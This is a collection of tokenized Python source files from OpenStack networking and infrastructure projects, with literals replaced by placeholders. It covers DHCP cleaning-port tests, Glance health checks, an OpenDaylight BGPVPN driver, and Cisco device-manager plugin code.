<EOL> def test_create_cleaning_ports_bad_config ( self , create_mock ) : <EOL> self . config ( cleaning_network_uuid = None , group = '<STR_LIT>' ) <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . InvalidParameterValue , <EOL> api . create_cleaning_ports , task ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports ( self , list_mock , delete_mock ) : <EOL> other_port = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> list_mock . return_value = { '<STR_LIT>' : [ self . neutron_port , other_port ] } <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api . delete_cleaning_ports ( task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> delete_mock . assert_called_once_with ( self . neutron_port [ '<STR_LIT:id>' ] ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports_list_fail ( self , list_mock ) : <EOL> list_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . delete_cleaning_ports , <EOL> task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports_delete_fail ( self , list_mock , delete_mock ) : <EOL> list_mock . return_value = { '<STR_LIT>' : [ self . neutron_port ] } <EOL> delete_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . delete_cleaning_ports , <EOL> task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> delete_mock . assert_called_once_with ( self . neutron_port [ '<STR_LIT:id>' ] ) <EOL> def test_out_range_auth_strategy ( self ) : <EOL> self . assertRaises ( ValueError , cfg . CONF . set_override , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> enforce_type = True ) </s>
<s> import time <EOL> from tempest . lib . common . utils import misc as misc_utils <EOL> from tempest . lib import exceptions as lib_exc <EOL> def wait_for_bm_node_status ( client , node_id , attr , status ) : <EOL> """<STR_LIT>""" <EOL> _ , node = client . show_node ( node_id ) <EOL> start = int ( time . time ( ) ) <EOL> while node [ attr ] != status : <EOL> time . sleep ( client . build_interval ) <EOL> _ , node = client . show_node ( node_id ) <EOL> status_curr = node [ attr ] <EOL> if status_curr == status : <EOL> return <EOL> if int ( time . time ( ) ) - start >= client . build_timeout : <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT>' : node_id , <EOL> '<STR_LIT>' : attr , <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : client . build_timeout } ) <EOL> message += '<STR_LIT>' % ( attr , status_curr ) <EOL> caller = misc_utils . find_test_caller ( ) <EOL> if caller : <EOL> message = '<STR_LIT>' % ( caller , message ) <EOL> raise lib_exc . TimeoutException ( message ) </s>
<s> import shade <EOL> class SanityChecks ( object ) : <EOL> @ staticmethod <EOL> def keystone ( cloud ) : <EOL> [ tenant for tenant in cloud . keystone_client . tenants . list ( ) ] <EOL> @ staticmethod <EOL> def glance ( cloud ) : <EOL> [ image for image in cloud . glance_client . images . list ( ) ] <EOL> @ staticmethod <EOL> def cinder ( cloud ) : <EOL> [ volume for volume in cloud . cinder_client . volumes . list ( ) ] <EOL> @ staticmethod <EOL> def swift ( cloud ) : <EOL> [ container for container in cloud . swift_client . list ( ) ] <EOL> def main ( ) : <EOL> module = AnsibleModule ( <EOL> argument_spec = openstack_full_argument_spec ( <EOL> password = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> project = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> role = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> user = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> service = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> ) <EOL> ) <EOL> try : <EOL> changed = True <EOL> cloud = shade . operator_cloud ( ** module . params ) <EOL> getattr ( SanityChecks , module . params . pop ( "<STR_LIT>" ) ) ( cloud ) <EOL> module . exit_json ( changed = changed ) <EOL> except Exception as e : <EOL> module . exit_json ( failed = True , changed = True , msg = e ) <EOL> from ansible . module_utils . basic import * <EOL> from ansible . module_utils . openstack import * <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from oschecks import utils <EOL> def _check_glance_api ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:5> , <EOL> help = '<STR_LIT>' ) <EOL> glance . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:10> , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> def images_list ( ) : <EOL> return list ( client . images . list ( ) ) <EOL> elapsed , images = utils . timeit ( images_list ) <EOL> if not images : <EOL> utils . critical ( "<STR_LIT>" ) <EOL> if elapsed > options . critical : <EOL> utils . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( options . critical , elapsed ) ) <EOL> elif elapsed > options . warning : <EOL> utils . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( options . warning , elapsed ) ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( len ( images ) , elapsed , elapsed ) ) <EOL> def check_glance_api ( ) : <EOL> utils . safe_run ( _check_glance_api ) <EOL> def _check_glance_image_exists ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , <EOL> required = False , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> glance . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , type = str , <EOL> nargs = '<STR_LIT:+>' , required = False , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> valid_image = <NUM_LIT:0> <EOL> count = len ( list ( client . images . list ( ** { "<STR_LIT>" : options . req_count or <NUM_LIT:1> } ) ) ) <EOL> if options . req_images : <EOL> required_images = options . req_images <EOL> for image in required_images : <EOL> try : <EOL> if len ( list ( client . images . list ( <EOL> ** { "<STR_LIT>" : { "<STR_LIT:name>" : image } } ) ) ) == <NUM_LIT:1> : <EOL> valid_image = valid_image + <NUM_LIT:1> <EOL> except Exception : <EOL> pass <EOL> if options . req_count and count < options . req_count : <EOL> utils . critical ( "<STR_LIT>" % <EOL> ( options . req_count , count ) ) <EOL> if options . req_images and valid_image < len ( required_images ) : <EOL> utils . critical ( "<STR_LIT>" % <EOL> ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) , valid_image , <EOL> len ( required_images ) ) ) <EOL> if options . req_images and options . req_count : <EOL> utils . ok ( "<STR_LIT>" % <EOL> ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) , options . req_count ) ) <EOL> elif options . req_images : <EOL> utils . ok ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) ) ) <EOL> elif options . req_count : <EOL> utils . ok ( "<STR_LIT>" % ( count ) ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" ) <EOL> def check_glance_image_exists ( ) : <EOL> utils . safe_run ( _check_glance_image_exists ) <EOL> def _check_glance_upload ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = str , <EOL> default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> data_raw = "<STR_LIT:X>" * <NUM_LIT> * <NUM_LIT> <EOL> elapsed , res = utils . timeit ( client . images . create , <EOL> data = data_raw , <EOL> disk_format = '<STR_LIT>' , <EOL> container_format = '<STR_LIT>' , <EOL> name = options . image_name ) <EOL> if not res or not res . id or res . status != '<STR_LIT>' : <EOL> utils . critical ( "<STR_LIT>" ) <EOL> res . delete ( ) <EOL> if elapsed > <NUM_LIT:20> : <EOL> utils . warning ( "<STR_LIT>" ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" % elapsed ) <EOL> def check_glance_upload ( ) : <EOL> utils . safe_run ( _check_glance_upload ) </s>
<s> import requests <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> from networking_odl . common import client as odl_client <EOL> from networking_bgpvpn . neutron . extensions import bgpvpn as bgpvpn_ext <EOL> from networking_bgpvpn . neutron . services . common import constants <EOL> from networking_bgpvpn . neutron . services . service_drivers import driver_api <EOL> cfg . CONF . import_group ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> BGPVPNS = '<STR_LIT>' <EOL> OPENDAYLIGHT_BGPVPN_DRIVER_NAME = '<STR_LIT>' <EOL> class OpenDaylightBgpvpnDriver ( driver_api . BGPVPNDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , service_plugin ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> super ( OpenDaylightBgpvpnDriver , self ) . __init__ ( service_plugin ) <EOL> self . service_plugin = service_plugin <EOL> self . client = odl_client . OpenDaylightRestClient . create_client ( ) <EOL> def _scrub_rd_list ( self , bgpvpn ) : <EOL> if len ( bgpvpn [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> bgpvpn [ '<STR_LIT>' ] = bgpvpn [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def create_bgpvpn_precommit ( self , context , bgpvpn ) : <EOL> if bgpvpn [ '<STR_LIT:type>' ] != constants . BGPVPN_L3 : <EOL> raise bgpvpn_ext . BGPVPNTypeNotSupported ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME , <EOL> type = bgpvpn [ '<STR_LIT:type>' ] ) <EOL> def create_bgpvpn_postcommit ( self , context , bgpvpn ) : <EOL> url = BGPVPNS <EOL> try : <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_bgpvpn = self . bgpvpn_db . delete_bgpvpn ( context , bgpvpn [ '<STR_LIT:id>' ] ) <EOL> LOG . debug ( "<STR_LIT>" , d_bgpvpn ) <EOL> def delete_bgpvpn_postcommit ( self , context , bgpvpn ) : <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , None ) <EOL> def update_bgpvpn_postcommit ( self , context , old_bgpvpn , bgpvpn ) : <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> def create_net_assoc_precommit ( self , context , net_assoc ) : <EOL> bgpvpns = self . bgpvpn_db . find_bgpvpns_for_network ( <EOL> context , net_assoc [ '<STR_LIT>' ] ) <EOL> if len ( bgpvpns ) > <NUM_LIT:1> : <EOL> raise bgpvpn_ext . BGPVPNNetworkAssocExistsAnotherBgpvpn ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME , <EOL> network = net_assoc [ '<STR_LIT>' ] , <EOL> bgpvpn = bgpvpns [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> def create_net_assoc_postcommit ( self , context , net_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , net_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> try : <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_netassoc = self . bgpvpn_db . delete_net_assoc ( <EOL> context , net_assoc [ '<STR_LIT:id>' ] , net_assoc [ '<STR_LIT>' ] ) <EOL> LOG . debug ( "<STR_LIT>" , d_netassoc ) <EOL> def delete_net_assoc_postcommit ( self , context , net_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , net_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> def create_router_assoc_precommit ( self , context , router_assoc ) : <EOL> associated_routers = self . get_router_assocs ( context , <EOL> router_assoc [ '<STR_LIT>' ] ) <EOL> for assoc_router in associated_routers : <EOL> if ( router_assoc [ "<STR_LIT>" ] != assoc_router [ "<STR_LIT>" ] ) : <EOL> raise bgpvpn_ext . BGPVPNMultipleRouterAssocNotSupported ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME ) <EOL> def create_router_assoc_postcommit ( self , context , router_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , router_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> try : <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_routerassoc = self . bgpvpn_db . delete_router_assoc ( <EOL> context , router_assoc [ '<STR_LIT:id>' ] , router_assoc [ '<STR_LIT>' ] ) <EOL> LOG . debug ( "<STR_LIT>" , d_routerassoc ) <EOL> def delete_router_assoc_postcommit ( self , context , router_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , router_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) </s>
<s> VM_INFO = <NUM_LIT:1000> <EOL> UPDATE_IP_RULE = <NUM_LIT> <EOL> UPLINK_NAME = <NUM_LIT> <EOL> DFA_AGENT_QUEUE = '<STR_LIT>' <EOL> DFA_SERVER_QUEUE = '<STR_LIT>' <EOL> DFA_EXCHANGE = '<STR_LIT>' <EOL> RESULT_FAIL = '<STR_LIT>' <EOL> RESULT_SUCCESS = '<STR_LIT>' <EOL> CREATE_FAIL = '<STR_LIT>' <EOL> DELETE_FAIL = '<STR_LIT>' <EOL> UPDATE_FAIL = '<STR_LIT>' <EOL> IP_DHCP_WAIT = "<STR_LIT>" <EOL> DHCP_PORT_CHECK = <NUM_LIT:3> <EOL> MAIN_INTERVAL = <NUM_LIT:5> <EOL> PROCESS_QUE_INTERVAL = <NUM_LIT:1> <EOL> FAIL_REC_INTERVAL = <NUM_LIT> <EOL> HB_INTERVAL = <NUM_LIT:30> <EOL> INVALID_OFPORT = - <NUM_LIT:1> <EOL> INVALID_VLAN = - <NUM_LIT:1> <EOL> MIN_VLAN_TAG = <NUM_LIT:1> <EOL> MAX_VLAN_TAG = <NUM_LIT> <EOL> VM_MSG_TYPE = <NUM_LIT:50> <EOL> UPLINK_MSG_TYPE = <NUM_LIT> <EOL> UPLINK_DET_INTERVAL = <NUM_LIT:10> <EOL> ERR_PROC_INTERVAL = <NUM_LIT:20> <EOL> UPLINK_DOWN_THRES = <NUM_LIT:2> <EOL> Q_UPL_PRIO = <NUM_LIT:1> <EOL> Q_VM_PRIO = <NUM_LIT:2> </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , default = <NUM_LIT:0> ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False , <EOL> server_default = sa . sql . false ( ) ) ) </s>
<s> import abc <EOL> import six <EOL> from oslo_log import log as logging <EOL> from networking_cisco . _i18n import _ <EOL> from six . moves import queue as Queue <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class ServiceHelperBase ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _observers = [ ] <EOL> def register ( self , observer ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> if observer not in self . _observers : <EOL> self . _observers . append ( observer ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> def unregister ( self , observer ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> if observer in self . _observers : <EOL> self . _observers . remove ( observer ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> def notify ( self , resource , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> for observer in self . _observers : <EOL> LOG . debug ( "<STR_LIT>" , observer . __class__ . __name__ ) <EOL> observer . update ( resource , ** kwargs ) <EOL> def update ( self , resource , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> @ abc . abstractmethod <EOL> def process_service ( self , * args , ** kwargs ) : <EOL> raise NotImplementedError <EOL> class QueueMixin ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( QueueMixin , self ) . __init__ ( ) <EOL> self . _queues = { } <EOL> def enqueue ( self , qname , data ) : <EOL> if qname not in self . _queues : <EOL> self . _queues [ qname ] = Queue . Queue ( ) <EOL> queue = self . _queues [ qname ] <EOL> queue . put ( data ) <EOL> def dequeue ( self , qname ) : <EOL> if qname not in self . _queues : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) , qname ) <EOL> try : <EOL> return self . _queues [ qname ] . get ( block = False ) <EOL> except Queue . Empty : <EOL> return None <EOL> def qsize ( self , qname ) : <EOL> """<STR_LIT>""" <EOL> if qname in self . _queues : <EOL> return self . _queues [ qname ] . qsize ( ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) , qname ) </s>
<s> T1_SUBNET_CIDR = '<STR_LIT>' <EOL> T2_SUBNET_CIDR = '<STR_LIT>' <EOL> T1_PORT_NAME = '<STR_LIT>' <EOL> T2_PORT_NAME = '<STR_LIT>' <EOL> T1_NETWORK_NAME = '<STR_LIT>' <EOL> T2_NETWORK_NAME = '<STR_LIT>' <EOL> T1_SUBNET_NAME = '<STR_LIT>' <EOL> T2_SUBNET_NAME = '<STR_LIT>' </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_service import loopingcall <EOL> from oslo_utils import importutils <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron import manager <EOL> import networking_cisco . plugins <EOL> from networking_cisco . plugins . cisco . common import ( cisco_constants as <EOL> c_constants ) <EOL> from networking_cisco . plugins . cisco . db . device_manager import ( <EOL> hosting_device_manager_db as dev_mgr_db ) <EOL> from networking_cisco . plugins . cisco . db . scheduler import ( <EOL> cfg_agentschedulers_db as agt_sched_db ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devices_cfgagent_rpc_cb as devices_rpc ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devmgr_rpc_cfgagent_api ) <EOL> from networking_cisco . plugins . cisco . extensions import ciscocfgagentscheduler <EOL> from networking_cisco . plugins . cisco . extensions import ciscohostingdevicemanager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class CiscoDeviceManagerPlugin ( dev_mgr_db . HostingDeviceManagerMixin , <EOL> agt_sched_db . CfgAgentSchedulerDbMixin ) : <EOL> """<STR_LIT>""" <EOL> supported_extension_aliases = [ <EOL> ciscohostingdevicemanager . HOSTING_DEVICE_MANAGER_ALIAS , <EOL> ciscocfgagentscheduler . CFG_AGENT_SCHEDULER_ALIAS ] <EOL> path_prefix = ciscocfgagentscheduler . PATH_PREFIX <EOL> def __init__ ( self ) : <EOL> self . setup_rpc ( ) <EOL> basepath = networking_cisco . plugins . __path__ [ <NUM_LIT:0> ] <EOL> ext_paths = [ basepath + '<STR_LIT>' ] <EOL> cp = cfg . CONF . api_extensions_path <EOL> to_add = "<STR_LIT>" <EOL> for ext_path in ext_paths : <EOL> if cp . find ( ext_path ) == - <NUM_LIT:1> : <EOL> to_add += '<STR_LIT::>' + ext_path <EOL> if to_add != "<STR_LIT>" : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , cp + to_add ) <EOL> self . cfg_agent_scheduler = importutils . import_object ( <EOL> cfg . CONF . general . configuration_agent_scheduler_driver ) <EOL> self . _setup_cfg_agent_monitoring ( ) <EOL> def setup_rpc ( self ) : <EOL> self . topic = c_constants . DEVICE_MANAGER_PLUGIN <EOL> self . conn = n_rpc . create_connection ( new = True ) <EOL> self . agent_notifiers [ c_constants . AGENT_TYPE_CFG ] = ( <EOL> devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( self ) ) <EOL> self . endpoints = [ devices_rpc . DeviceMgrCfgRpcCallback ( self ) ] <EOL> self . conn . create_consumer ( self . topic , self . endpoints , fanout = False ) <EOL> self . conn . consume_in_threads ( ) <EOL> def _setup_cfg_agent_monitoring ( self ) : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _heartbeat = loopingcall . FixedIntervalLoopingCall ( <EOL> self . _check_config_agents ) <EOL> self . _heartbeat . start ( <EOL> interval = cfg . CONF . general . cfg_agent_monitoring_interval ) <EOL> @ property <EOL> def _core_plugin ( self ) : <EOL> try : <EOL> return self . _plugin <EOL> except AttributeError : <EOL> self . _plugin = manager . NeutronManager . get_plugin ( ) <EOL> return self . _plugin </s>
<s> """<STR_LIT>""" <EOL> EXEC_CONF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_INTF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_VERSION_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_INVENTORY_SNIPPET = """<STR_LIT>""" <EOL> EXEC_SAVE_CONF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_VLAN_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CONF_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CONF_VNSEGMENT_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CREATE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_ACTIVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_NO_SHUTDOWN_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_CONF_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_VLAN_NATIVE_HEADER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_NATIVE_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_ALLOWED_HEADER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_ALLOWED_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_HEADER = """<STR_LIT>""" <EOL> CMD_VLAN_ID = """<STR_LIT>""" <EOL> CMD_VLAN_ADD_ID = """<STR_LIT>""" % CMD_VLAN_ID <EOL> CMD_INT_VLAN_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_ALLOWED_HEADER + <EOL> CMD_VLAN_ID + <EOL> CMD_INT_VLAN_ALLOWED_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_INT_VLAN_ADD_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_ALLOWED_HEADER + <EOL> CMD_VLAN_ADD_ID + <EOL> CMD_INT_VLAN_ALLOWED_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_INT_VLAN_NATIVE_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_NATIVE_HEADER + <EOL> CMD_VLAN_ID + <EOL> CMD_INT_VLAN_NATIVE_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_PORT_TRUNK = """<STR_LIT>""" <EOL> CMD_NO_SWITCHPORT = """<STR_LIT>""" <EOL> CMD_NO_VLAN_INT_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_INT_NATIVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_SVI_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_SVI_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_INT_NVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_MEMBER_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_NO_MEMBER_SNIPPET = """<STR_LIT>""" <EOL> CMD_FEATURE_VXLAN_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_FEATURE_VXLAN_SNIPPET = """<STR_LIT>""" <EOL> RE_GET_VLAN_ID = "<STR_LIT>" <EOL> RE_GET_VLAN_NAME = "<STR_LIT>" <EOL> RE_GET_VLAN_STATE = "<STR_LIT>" <EOL> RE_GET_VLAN_SHUT_STATE = "<STR_LIT>" </s>
<s> import os <EOL> import contextlib <EOL> import mock <EOL> from oslo_config import cfg <EOL> from oslo_utils import importutils <EOL> import six <EOL> import webob . exc <EOL> from neutron . api import extensions as api_ext <EOL> from neutron . common import config <EOL> from neutron import context as n_context <EOL> from neutron . manager import NeutronManager <EOL> from neutron . plugins . common import constants as svc_constants <EOL> from neutron . tests . unit . db import test_db_base_plugin_v2 <EOL> import networking_cisco <EOL> from networking_cisco . plugins . cisco . common import ( cisco_constants as <EOL> c_constants ) <EOL> from networking_cisco . plugins . cisco . db . device_manager import ( <EOL> hosting_device_manager_db as hdm_db ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devmgr_rpc_cfgagent_api ) <EOL> from networking_cisco . plugins . cisco . device_manager import service_vm_lib <EOL> from networking_cisco . plugins . cisco . extensions import ciscohostingdevicemanager <EOL> from networking_cisco . tests . unit . cisco . device_manager import ( <EOL> device_manager_test_support ) <EOL> policy_path = ( os . path . abspath ( networking_cisco . __path__ [ <NUM_LIT:0> ] ) + <EOL> '<STR_LIT>' ) <EOL> DB_DM_PLUGIN_KLASS = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> NN_CATEGORY = ciscohostingdevicemanager . NETWORK_NODE_CATEGORY <EOL> NN_TEMPLATE_NAME = c_constants . NETWORK_NODE_TEMPLATE <EOL> NS_ROUTERTYPE_NAME = c_constants . NAMESPACE_ROUTER_TYPE <EOL> VM_CATEGORY = ciscohostingdevicemanager . VM_CATEGORY <EOL> VM_TEMPLATE_NAME = "<STR_LIT>" <EOL> VM_BOOTING_TIME = <NUM_LIT> <EOL> VM_SLOT_CAPACITY = <NUM_LIT:3> <EOL> VM_DESIRED_SLOTS_FREE = <NUM_LIT:3> <EOL> VM_ROUTERTYPE_NAME = c_constants . CSR1KV_ROUTER_TYPE <EOL> HW_CATEGORY = ciscohostingdevicemanager . HARDWARE_CATEGORY <EOL> HW_TEMPLATE_NAME = "<STR_LIT>" <EOL> HW_ROUTERTYPE_NAME = "<STR_LIT>" <EOL> L3_ROUTER_NAT = svc_constants . L3_ROUTER_NAT <EOL> DEFAULT_SERVICE_TYPES = "<STR_LIT>" <EOL> NETWORK_NODE_SERVICE_TYPES = "<STR_LIT>" <EOL> NOOP_DEVICE_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> NOOP_PLUGGING_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> TEST_DEVICE_DRIVER = NOOP_DEVICE_DRIVER <EOL> TEST_PLUGGING_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> DESCRIPTION = "<STR_LIT>" <EOL> SHARED = True <EOL> ACTION = "<STR_LIT>" <EOL> ENABLED = True <EOL> ADMIN_STATE_UP = True <EOL> UNBOUND = None <EOL> REQUESTER = True <EOL> OTHER = False <EOL> 